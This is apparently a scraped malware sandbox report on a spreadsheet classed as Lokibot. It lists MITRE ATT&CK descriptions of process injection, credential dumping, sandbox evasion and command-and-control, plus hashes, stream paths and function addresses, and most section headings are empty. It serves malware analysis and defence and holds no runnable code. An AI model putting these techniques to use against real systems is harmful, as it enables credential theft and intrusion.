Source File: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast
String ID: h"$h"
API String ID: 1452528299-2228881058
Opcode ID: 79bcf7ced60dfb95193866f3fb7abd54ad86436b156aaa61155f147c64b085b9
Instruction ID: c7899770f42b5b626c15df61e30e702414222345dcce4fc8c6e5b49a8602e730
Opcode Fuzzy Hash: 79bcf7ced60dfb95193866f3fb7abd54ad86436b156aaa61155f147c64b085b9
Instruction Fuzzy Hash: 5621A17352012ABE9B15AFE4ECC6DEF7B6CEF44380B500095B512A6041EE78DF108AB0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report MV FORTUNE TRADER.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Lokibot

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "MV FORTUNE TRADER.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Function 00403D74, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 200
fileCOMMON

Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Function 004061C3, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151
COMMON

Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
libraryloaderCOMMON

Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Function 00404056, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Function 004044A7, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Function 004049B3, Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16
networkCOMMON

Function 004049DC, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13
registryCOMMON

Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Function 00408B2C, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Function 004044EE, Relevance: 1.3, APIs: 1, Instructions: 77
COMMON

Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16
COMMON

Function 00403C40, Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre